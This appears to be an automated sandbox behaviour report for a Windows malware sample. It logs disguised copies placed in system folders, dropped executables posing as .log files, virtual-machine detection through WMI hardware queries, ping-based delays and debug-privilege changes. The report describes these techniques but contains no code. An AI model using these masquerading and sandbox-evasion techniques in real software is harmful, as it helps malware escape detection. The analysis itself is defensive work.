Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\IME\en-GB\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Memory allocated: E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Memory allocated: 1AC20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Memory allocated: 1320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Memory allocated: 1B310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Memory allocated: 1240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Memory allocated: 1AF20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Memory allocated: 770000 memory reserve \| memory write watch
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Memory allocated: 1A4F0000 memory reserve \| memory write watch
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Memory allocated: B90000 memory reserve \| memory write watch
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Memory allocated: 1A820000 memory reserve \| memory write watch
Source: C:\Recovery\upfc.exe	Memory allocated: FF0000 memory reserve \| memory write watch
Source: C:\Recovery\upfc.exe	Memory allocated: 1AD50000 memory reserve \| memory write watch
Source: C:\Recovery\upfc.exe	Memory allocated: D60000 memory reserve \| memory write watch
Source: C:\Recovery\upfc.exe	Memory allocated: 1A700000 memory reserve \| memory write watch
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Memory allocated: 650000 memory reserve \| memory write watch
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Memory allocated: 1A3B0000 memory reserve \| memory write watch
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Memory allocated: FA0000 memory reserve \| memory write watch
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Memory allocated: 1AA70000 memory reserve \| memory write watch
Source: C:\Windows\IME\en-GB\Registry.exe	Memory allocated: 11B0000 memory reserve \| memory write watch
Source: C:\Windows\IME\en-GB\Registry.exe	Memory allocated: 1AE90000 memory reserve \| memory write watch
Source: C:\Windows\IME\en-GB\Registry.exe	Memory allocated: F70000 memory reserve \| memory write watch
Source: C:\Windows\IME\en-GB\Registry.exe	Memory allocated: 1ADE0000 memory reserve \| memory write watch
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Memory allocated: EB0000 memory reserve \| memory write watch
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Memory allocated: 1A9A0000 memory reserve \| memory write watch
Source: C:\Recovery\upfc.exe	Memory allocated: 940000 memory reserve \| memory write watch
Source: C:\Recovery\upfc.exe	Memory allocated: 1A6F0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\upfc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\upfc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\IME\en-GB\Registry.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\IME\en-GB\Registry.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\upfc.exe	Thread delayed: delay time: 922337203685477

Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rCwnUSpv.log	Jump to dropped file
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ISkSYroH.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qLTnEFIs.log	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MilkDJCZ.log	Jump to dropped file
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kSqObZEE.log	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\mgFxlINb.log	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bJiZPSMv.log	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\paINcIrQ.log	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZzLYPzhu.log	Jump to dropped file
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RBEiIUto.log	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kmqOzLcc.log	Jump to dropped file
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gXpxUtOK.log	Jump to dropped file

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe TID: 6812	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe TID: 6472	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe TID: 5760	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe TID: 344	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe TID: 3340	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe TID: 6480	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\upfc.exe TID: 6764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\upfc.exe TID: 6796	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe TID: 3996	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe TID: 6104	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\IME\en-GB\Registry.exe TID: 3056	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\IME\en-GB\Registry.exe TID: 3480	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe TID: 5780	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\upfc.exe TID: 6804	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\upfc.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\upfc.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\IME\en-GB\Registry.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\IME\en-GB\Registry.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\upfc.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\upfc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\upfc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\IME\en-GB\Registry.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\IME\en-GB\Registry.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\upfc.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior

Source: iHstGpVMr4QFhc62UUbis.exe, 0000001B.00000002.1661809574.000000001B847000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAWrorC%SystemRoot%\system32\mswsock.dll"

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process token adjusted: Debug
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process token adjusted: Debug
Source: C:\Recovery\upfc.exe	Process token adjusted: Debug
Source: C:\Recovery\upfc.exe	Process token adjusted: Debug
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process token adjusted: Debug
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Process token adjusted: Debug
Source: C:\Windows\IME\en-GB\Registry.exe	Process token adjusted: Debug
Source: C:\Windows\IME\en-GB\Registry.exe	Process token adjusted: Debug
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe

Memory allocated: page read and write | page guard

Jump to behavior

